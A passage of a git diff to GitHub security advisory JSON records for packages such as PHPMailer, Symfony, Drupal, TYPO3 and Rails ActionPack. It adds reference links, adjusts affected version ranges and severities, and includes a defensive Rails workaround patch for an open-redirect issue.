"https://github.com/phpseclib/phpseclib/releases/tag/2.0.31" diff --git a/advisories/github-reviewed/2021/05/GHSA-4mqv-gcr3-pff9/GHSA-4mqv-gcr3-pff9.json b/advisories/github-reviewed/2021/05/GHSA-4mqv-gcr3-pff9/GHSA-4mqv-gcr3-pff9.json index d2299a4c5b3a9..61333994b0936 100644 --- a/advisories/github-reviewed/2021/05/GHSA-4mqv-gcr3-pff9/GHSA-4mqv-gcr3-pff9.json +++ b/advisories/github-reviewed/2021/05/GHSA-4mqv-gcr3-pff9/GHSA-4mqv-gcr3-pff9.json @@ -40,10 +40,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7776" }, + { + "type": "WEB", + "url": "https://github.com/PHPOffice/PhpSpreadsheet/pull/1719" + }, { "type": "WEB", "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/0ed5b800be2136bcb8fa9c1bdf59abc957a98845" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpoffice/phpspreadsheet/CVE-2020-7776.yaml" + }, { "type": "WEB", "url": "https://github.com/PHPOffice/PhpSpreadsheet/blob/master/src/PhpSpreadsheet/Writer/Html.php%23L1792" diff --git a/advisories/github-reviewed/2021/05/GHSA-m298-fh5c-jc66/GHSA-m298-fh5c-jc66.json b/advisories/github-reviewed/2021/05/GHSA-m298-fh5c-jc66/GHSA-m298-fh5c-jc66.json index 02f7f42615e20..5f1b3e2b143b3 100644 --- a/advisories/github-reviewed/2021/05/GHSA-m298-fh5c-jc66/GHSA-m298-fh5c-jc66.json +++ b/advisories/github-reviewed/2021/05/GHSA-m298-fh5c-jc66/GHSA-m298-fh5c-jc66.json @@ -48,6 +48,14 @@ "type": "WEB", "url": "https://github.com/PHPMailer/PHPMailer/commit/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpmailer/phpmailer/CVE-2020-36326.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/PHPMailer/PHPMailer/releases/tag/v6.4.1" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3B5WDPGUFNPG4NAZ6G4BZX43BKLAVA5B/" diff --git a/advisories/github-reviewed/2021/05/GHSA-rwgm-f83r-v3qj/GHSA-rwgm-f83r-v3qj.json b/advisories/github-reviewed/2021/05/GHSA-rwgm-f83r-v3qj/GHSA-rwgm-f83r-v3qj.json index a1b9733c185fa..069d876684664 100644 --- a/advisories/github-reviewed/2021/05/GHSA-rwgm-f83r-v3qj/GHSA-rwgm-f83r-v3qj.json +++ b/advisories/github-reviewed/2021/05/GHSA-rwgm-f83r-v3qj/GHSA-rwgm-f83r-v3qj.json @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "0.12.0" }, { "fixed": "2.5.0" @@ -67,6 +67,10 @@ { "type": "WEB", "url": "https://github.com/wp-cli/wp-cli/pull/5523" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/wp-cli/wp-cli/CVE-2021-29504.yaml" } ], "database_specific": { diff --git a/advisories/github-reviewed/2021/06/GHSA-77mr-wc79-m8j3/GHSA-77mr-wc79-m8j3.json b/advisories/github-reviewed/2021/06/GHSA-77mr-wc79-m8j3/GHSA-77mr-wc79-m8j3.json index 4d151e1f171d1..f09ea3fdc63a0 100644 --- a/advisories/github-reviewed/2021/06/GHSA-77mr-wc79-m8j3/GHSA-77mr-wc79-m8j3.json +++ b/advisories/github-reviewed/2021/06/GHSA-77mr-wc79-m8j3/GHSA-77mr-wc79-m8j3.json @@ -1,15 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-77mr-wc79-m8j3", - "modified": "2021-10-21T13:23:23Z", + "modified": "2024-02-07T18:16:24Z", "published": "2021-06-22T15:18:02Z", "aliases": [ "CVE-2021-3603" ], - "summary": "A validation function with the same name as a built-in validator can be called", + "summary": "PHPMailer untrusted code may be run from an overridden address validator", "details": "If a function is defined that has the same name as the default built-in email address validation scheme (`php`), it will be called in default configuration as when no validation scheme is provided, the default scheme's callable `php` was being called. If an attacker is able to inject such a function into the application (a much bigger issue), it will be called whenever an email address is validated, such as when calling `validateAddress()`.\n\n### Impact\nLow impact – exploitation requires that an attacker can already inject code into an application, but it provides a trigger pathway.\n\n### Patches\nThis is patched in PHPMailer 6.5.0 by denying the use of simple strings as validator function names, which is a very minor BC break.\n\n### Workarounds\nInject your own email validator function.\n\n### References\nReported by [Vikrant Singh Chauhan](mailto:vi@hackberry.xyz) via [huntr.dev](https://www.huntr.dev/).\n[CVE-2021-3603](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3603)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)\n* [Email us](mailto:phpmailer@synchromedia.co.uk).\n", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -45,10 +48,26 @@ "type": "WEB", "url": "https://github.com/PHPMailer/PHPMailer/commit/45f3c18dc6a2de1cb1bf49b9b249a9ee36a5f7f3" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpmailer/phpmailer/CVE-2021-3603.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/PHPMailer/PHPMailer" }, + { + "type": "WEB", + "url": "https://github.com/PHPMailer/PHPMailer/releases/tag/v6.5.0" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3YRMWGA4VTMXFB22KICMB7YMFZNFV3EJ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FJYSOFCUBS67J3TKR74SD3C454N7VTYM/" + }, { "type": "WEB", "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3603" @@ -60,9 +79,10 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-829" ], - "severity": "LOW", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2021-06-16T19:49:12Z", "nvd_published_at": "2021-06-17T12:15:00Z" diff --git a/advisories/github-reviewed/2021/06/GHSA-7q44-r25x-wm4q/GHSA-7q44-r25x-wm4q.json b/advisories/github-reviewed/2021/06/GHSA-7q44-r25x-wm4q/GHSA-7q44-r25x-wm4q.json index 3065e4b7298c6..1f7b9733d4f5d 100644 --- a/advisories/github-reviewed/2021/06/GHSA-7q44-r25x-wm4q/GHSA-7q44-r25x-wm4q.json +++ b/advisories/github-reviewed/2021/06/GHSA-7q44-r25x-wm4q/GHSA-7q44-r25x-wm4q.json @@ -48,10 +48,18 @@ "type": "WEB", "url": "https://github.com/PHPMailer/PHPMailer/commit/acd264bf17ff4ac5c915f0d4226dce8a9ea70bc3" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpmailer/phpmailer/CVE-2021-34551.yaml" + }, { "type": "WEB", "url": "https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md" }, + { + "type": "WEB", + "url": "https://github.com/PHPMailer/PHPMailer/releases/tag/v6.5.0" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3YRMWGA4VTMXFB22KICMB7YMFZNFV3EJ/" diff --git a/advisories/github-reviewed/2021/06/GHSA-9f46-5r25-5wfm/GHSA-9f46-5r25-5wfm.json b/advisories/github-reviewed/2021/06/GHSA-9f46-5r25-5wfm/GHSA-9f46-5r25-5wfm.json index de368e480aaf7..7281a7c881a70 100644 --- a/advisories/github-reviewed/2021/06/GHSA-9f46-5r25-5wfm/GHSA-9f46-5r25-5wfm.json +++ b/advisories/github-reviewed/2021/06/GHSA-9f46-5r25-5wfm/GHSA-9f46-5r25-5wfm.json @@ -71,6 +71,10 @@ "type": "WEB", "url": "https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/league/flysystem/CVE-2021-32708.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/thephpleague/flysystem" diff --git a/advisories/github-reviewed/2021/06/GHSA-m5vx-8chx-qvmm/GHSA-m5vx-8chx-qvmm.json b/advisories/github-reviewed/2021/06/GHSA-m5vx-8chx-qvmm/GHSA-m5vx-8chx-qvmm.json index dbd43d3e4329b..3d26a17efaff8 100644 --- a/advisories/github-reviewed/2021/06/GHSA-m5vx-8chx-qvmm/GHSA-m5vx-8chx-qvmm.json +++ b/advisories/github-reviewed/2021/06/GHSA-m5vx-8chx-qvmm/GHSA-m5vx-8chx-qvmm.json @@ -94,6 +94,10 @@ "type": "WEB", "url": "https://github.com/neos/form/commit/69de4219b1f58157e2be6b05811463875d75c246" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/neos/form/CVE-2021-32697.yaml" + }, { "type": "WEB", "url": "https://github.com/neos/form/releases/tag/5.1.3" diff --git a/advisories/github-reviewed/2021/06/GHSA-mg2g-8pwj-r2j2/GHSA-mg2g-8pwj-r2j2.json b/advisories/github-reviewed/2021/06/GHSA-mg2g-8pwj-r2j2/GHSA-mg2g-8pwj-r2j2.json index a07f7603fe3e7..46be45c143e90 100644 --- a/advisories/github-reviewed/2021/06/GHSA-mg2g-8pwj-r2j2/GHSA-mg2g-8pwj-r2j2.json +++ b/advisories/github-reviewed/2021/06/GHSA-mg2g-8pwj-r2j2/GHSA-mg2g-8pwj-r2j2.json @@ -25,16 +25,13 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "4.0.0-alpha1" + "introduced": "3.0.0" }, { - "fixed": "4.0.0-alpha2" + "fixed": "3.5.0" } ] } - ], - "versions": [ - "4.0.0-alpha1" ] }, { @@ -47,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.0.0" + "introduced": "4.0.0-alpha1" }, { - "fixed": "3.5.0" + "fixed": "4.0.0-alpha2" } ] } @@ -66,6 +63,10 @@ "type": "WEB", "url": "https://forum.silverstripe.org/c/releases" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/graphql/CVE-2020-26136.yaml" + }, { "type": "WEB", "url": "https://www.silverstripe.org/blog/tag/release" diff --git a/advisories/github-reviewed/2021/06/GHSA-rfcf-m67m-jcrq/GHSA-rfcf-m67m-jcrq.json b/advisories/github-reviewed/2021/06/GHSA-rfcf-m67m-jcrq/GHSA-rfcf-m67m-jcrq.json index 76f57a4f892a0..cbcafa7c4524a 100644 --- a/advisories/github-reviewed/2021/06/GHSA-rfcf-m67m-jcrq/GHSA-rfcf-m67m-jcrq.json +++ b/advisories/github-reviewed/2021/06/GHSA-rfcf-m67m-jcrq/GHSA-rfcf-m67m-jcrq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rfcf-m67m-jcrq", - "modified": "2021-10-21T13:55:20Z", + "modified": "2024-02-05T11:13:38Z", "published": "2021-06-21T17:03:44Z", "aliases": [ "CVE-2021-32693" @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.3.0" + }, + { + "fixed": "5.3.2" + } + ] + } + ] } ], "references": [ @@ -52,6 +71,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/3084764ad82f29dbb025df19978b9cbc3ab34728" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2021-32693.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2021-32693.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/security-http" @@ -59,13 +86,17 @@ { "type": "WEB", "url": "https://symfony.com/blog/cve-2021-32693-authentication-granted-to-all-firewalls-instead-of-just-one" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2021-32693" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], - "severity": "HIGH", + "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2021-06-18T20:33:08Z", "nvd_published_at": "2021-06-17T23:15:00Z" diff --git a/advisories/github-reviewed/2021/06/GHSA-rgx6-rjj4-c388/GHSA-rgx6-rjj4-c388.json b/advisories/github-reviewed/2021/06/GHSA-rgx6-rjj4-c388/GHSA-rgx6-rjj4-c388.json index 7b53caeb03fe1..a471176619db5 100644 --- a/advisories/github-reviewed/2021/06/GHSA-rgx6-rjj4-c388/GHSA-rgx6-rjj4-c388.json +++ b/advisories/github-reviewed/2021/06/GHSA-rgx6-rjj4-c388/GHSA-rgx6-rjj4-c388.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rgx6-rjj4-c388", - "modified": "2023-10-19T19:21:05Z", + "modified": "2024-02-08T09:40:35Z", "published": "2021-06-21T17:16:42Z", "aliases": [ "CVE-2021-33829" @@ -33,6 +33,158 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" + }, + { + "fixed": "7.80" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.9.16" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.0.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.1.0" + }, + { + "fixed": "9.1.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" + }, + { + "fixed": "7.80" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.9.16" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.0.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.1.0" + }, + { + "fixed": "9.1.9" + } + ] + } + ] } ], "references": [ @@ -44,6 +196,14 @@ "type": "WEB", "url": "https://ckeditor.com/blog/ckeditor-4.16.1-with-accessibility-enhancements/#improvements-for-comments-in-html-parser" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2021-33829.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2021-33829.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/ckeditor/ckeditor4" diff --git a/advisories/github-reviewed/2021/07/GHSA-34fr-fhqr-7235/GHSA-34fr-fhqr-7235.json b/advisories/github-reviewed/2021/07/GHSA-34fr-fhqr-7235/GHSA-34fr-fhqr-7235.json index 014a3fb43efe4..04d31d94db950 100644 --- a/advisories/github-reviewed/2021/07/GHSA-34fr-fhqr-7235/GHSA-34fr-fhqr-7235.json +++ b/advisories/github-reviewed/2021/07/GHSA-34fr-fhqr-7235/GHSA-34fr-fhqr-7235.json @@ -109,6 +109,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.18" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.3.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.28" + } + ] + } + ] } ], "references": [ @@ -128,6 +185,14 @@ "type": "WEB", "url": "https://github.com/TYPO3/typo3/commit/0b4950163b8919451964133febc65bcdfcec721c" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-32767.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-32767.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3/typo3" diff --git a/advisories/github-reviewed/2021/07/GHSA-6mh3-j5r5-2379/GHSA-6mh3-j5r5-2379.json b/advisories/github-reviewed/2021/07/GHSA-6mh3-j5r5-2379/GHSA-6mh3-j5r5-2379.json index d9474dc9001c3..6da21e6f03693 100644 --- a/advisories/github-reviewed/2021/07/GHSA-6mh3-j5r5-2379/GHSA-6mh3-j5r5-2379.json +++ b/advisories/github-reviewed/2021/07/GHSA-6mh3-j5r5-2379/GHSA-6mh3-j5r5-2379.json @@ -89,10 +89,64 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "< 11.3.0" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.18" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.3.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.28" + } + ] + } + ] } ], "references": [ @@ -108,6 +162,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32668" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-32668.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-32668.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3/typo3" diff --git a/advisories/github-reviewed/2021/07/GHSA-8mq9-fqv8-59wf/GHSA-8mq9-fqv8-59wf.json b/advisories/github-reviewed/2021/07/GHSA-8mq9-fqv8-59wf/GHSA-8mq9-fqv8-59wf.json index 35d1457e4d0d3..bd6157843527b 100644 --- a/advisories/github-reviewed/2021/07/GHSA-8mq9-fqv8-59wf/GHSA-8mq9-fqv8-59wf.json +++ b/advisories/github-reviewed/2021/07/GHSA-8mq9-fqv8-59wf/GHSA-8mq9-fqv8-59wf.json @@ -71,6 +71,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.18" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.3.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.28" + } + ] + } + ] } ], "references": [ @@ -86,6 +143,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32667" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-32667.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-32667.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3/typo3" diff --git a/advisories/github-reviewed/2021/07/GHSA-c72p-9xmj-rx3w/GHSA-c72p-9xmj-rx3w.json b/advisories/github-reviewed/2021/07/GHSA-c72p-9xmj-rx3w/GHSA-c72p-9xmj-rx3w.json index 1bdd695f616e6..47af27ab55aa4 100644 --- a/advisories/github-reviewed/2021/07/GHSA-c72p-9xmj-rx3w/GHSA-c72p-9xmj-rx3w.json +++ b/advisories/github-reviewed/2021/07/GHSA-c72p-9xmj-rx3w/GHSA-c72p-9xmj-rx3w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c72p-9xmj-rx3w", - "modified": "2023-04-03T22:38:53Z", + "modified": "2024-01-31T15:31:56Z", "published": "2021-07-26T21:17:45Z", "aliases": [ "CVE-2021-32760" @@ -83,9 +83,17 @@ "type": "WEB", "url": "https://github.com/containerd/containerd/releases/tag/v1.5.4" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DDMNDPJJTP3J5GOEDB66F6MGXUTRG3Y3/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DDMNDPJJTP3J5GOEDB66F6MGXUTRG3Y3/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-31" } ], "database_specific": { diff --git a/advisories/github-reviewed/2021/07/GHSA-h58v-c6rf-g9f7/GHSA-h58v-c6rf-g9f7.json b/advisories/github-reviewed/2021/07/GHSA-h58v-c6rf-g9f7/GHSA-h58v-c6rf-g9f7.json index c9d2cc9cad301..449e87c9f3330 100644 --- a/advisories/github-reviewed/2021/07/GHSA-h58v-c6rf-g9f7/GHSA-h58v-c6rf-g9f7.json +++ b/advisories/github-reviewed/2021/07/GHSA-h58v-c6rf-g9f7/GHSA-h58v-c6rf-g9f7.json @@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0" + }, + { + "fixed": "4.9.16" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.10.0" + }, + { + "fixed": "4.11.5" + } + ] + } + ] } ], "references": [ @@ -67,6 +105,14 @@ "type": "WEB", "url": "https://contao.org/en/security-advisories/cross-site-scripting-in-the-system-log-2021.html" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2021-35210.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2021-35210.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/contao/contao" diff --git a/advisories/github-reviewed/2021/07/GHSA-rgcg-28xm-8mmw/GHSA-rgcg-28xm-8mmw.json b/advisories/github-reviewed/2021/07/GHSA-rgcg-28xm-8mmw/GHSA-rgcg-28xm-8mmw.json index ba81555bb6396..5ad8b2bc21a79 100644 --- a/advisories/github-reviewed/2021/07/GHSA-rgcg-28xm-8mmw/GHSA-rgcg-28xm-8mmw.json +++ b/advisories/github-reviewed/2021/07/GHSA-rgcg-28xm-8mmw/GHSA-rgcg-28xm-8mmw.json @@ -90,6 +90,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.18" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.3.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.28" + } + ] + } + ] } ], "references": [ @@ -101,6 +158,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32669" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-32669.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-32669.yaml" + }, { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-core-sa-2021-011" diff --git a/advisories/github-reviewed/2021/08/GHSA-2rqw-v265-jf8c/GHSA-2rqw-v265-jf8c.json b/advisories/github-reviewed/2021/08/GHSA-2rqw-v265-jf8c/GHSA-2rqw-v265-jf8c.json index 06aedbe1ecb01..abef02b3cda1e 100644 --- a/advisories/github-reviewed/2021/08/GHSA-2rqw-v265-jf8c/GHSA-2rqw-v265-jf8c.json +++ b/advisories/github-reviewed/2021/08/GHSA-2rqw-v265-jf8c/GHSA-2rqw-v265-jf8c.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-2rqw-v265-jf8c", - "modified": "2023-07-03T22:56:34Z", + "modified": "2024-02-02T16:47:01Z", "published": "2021-08-26T20:36:51Z", "aliases": [ "CVE-2021-22942" ], "summary": "Open Redirect in ActionPack", - "details": "# Overview\n\nThere is a possible open redirect vulnerability in the Host Authorization\nmiddleware in Action Pack. This vulnerability has been assigned the CVE\nidentifier CVE-2021-22942.\n\nVersions Affected: >= 6.0.0.\nNot affected: < 6.0.0\nFixed Versions: 6.1.4.1, 6.0.4.1\n\n# Impact\n\nSpecially crafted “X-Forwarded-Host” headers in combination with certain\n“allowed host” formats can cause the Host Authorization middleware in\nAction Pack to redirect users to a malicious website.\n\nImpacted applications will have allowed hosts with a leading dot.\nFor example, configuration files that look like this:\n\n```ruby\nconfig.hosts << '.EXAMPLE.com'\n```\n\nWhen an allowed host contains a leading dot, a specially crafted\nHost header can be used to redirect to a malicious website.\n\nThis vulnerability is similar to CVE-2021-22881, but CVE-2021-22881 did not\ntake in to account domain name case sensitivity.\n\n# Releases\n\nThe fixed releases are available at the normal locations.\n\n# Workarounds\n\nIn the case a patch can’t be applied, the following monkey patch can be\nused in an initializer:\n\n```ruby\nmodule ActionDispatch\n class HostAuthorization\n HOSTNAME = /[a-z0-9.-]+|\\[[a-f0-9]*:[a-f0-9.:]+\\]/i\n VALID_ORIGIN_HOST = /\\A(#{HOSTNAME})(?::\\d+)?\\z/\n VALID_FORWARDED_HOST = /(?:\\A|,[ ]?)(#{HOSTNAME})(?::\\d+)?\\z/\n\n private\n def authorized?(request)\n origin_host =\n request.get_header(\"HTTP_HOST\")&.slice(VALID_ORIGIN_HOST, 1) || \"\"\n forwarded_host =\n request.x_forwarded_host&.slice(VALID_FORWARDED_HOST, 1) || \"\"\n @permissions.allows?(origin_host) &&\n (forwarded_host.blank? || @permissions.allows?(forwarded_host))\n end\n end\nend\n```\n", + "details": "# Overview\n\nThere is a possible open redirect vulnerability in the Host Authorization middleware in Action Pack. This vulnerability has been assigned the CVE identifier CVE-2021-22942.\n\nVersions Affected: >= 6.0.0.\nNot affected: < 6.0.0\nFixed Versions: 6.1.4.1, 6.0.4.1\n\n# Impact\n\nSpecially crafted “X-Forwarded-Host” headers in combination with certain “allowed host” formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website.\n\nImpacted applications will have allowed hosts with a leading dot. For example, configuration files that look like this:\n\n```ruby\nconfig.hosts << '.EXAMPLE.com'\n```\n\nWhen an allowed host contains a leading dot, a specially crafted Host header can be used to redirect to a malicious website.\n\nThis vulnerability is similar to CVE-2021-22881, but CVE-2021-22881 did not take in to account domain name case sensitivity.\n\n# Releases\n\nThe fixed releases are available at the normal locations.\n\n# Workarounds\n\nIn the case a patch can’t be applied, the following monkey patch can be used in an initializer:\n\n```ruby\nmodule ActionDispatch\n class HostAuthorization\n HOSTNAME = /[a-z0-9.-]+|\\[[a-f0-9]*:[a-f0-9.:]+\\]/i\n VALID_ORIGIN_HOST = /\\A(#{HOSTNAME})(?::\\d+)?\\z/\n VALID_FORWARDED_HOST = /(?:\\A|,[ ]?)(#{HOSTNAME})(?::\\d+)?\\z/\n\n private\n def authorized?(request)\n origin_host =\n request.get_header(\"HTTP_HOST\")&.slice(VALID_ORIGIN_HOST, 1) || \"\"\n forwarded_host =\n request.x_forwarded_host&.slice(VALID_FORWARDED_HOST, 1) || \"\"\n @permissions.allows?(origin_host) &&\n (forwarded_host.blank? || @permissions.allows?(forwarded_host))\n end\n end\nend\n```\n", "severity": [ { "type": "CVSS_V3", @@ -71,7 +71,7 @@ }, { "type": "PACKAGE", - "url": "https://github.com/rails/rails/tree/main/actionpack" + "url": "https://github.com/rails/rails" }, { "type": "WEB", @@ -85,6 +85,10 @@ "type": "WEB", "url": "https://rubygems.org/gems/actionpack" }, + { 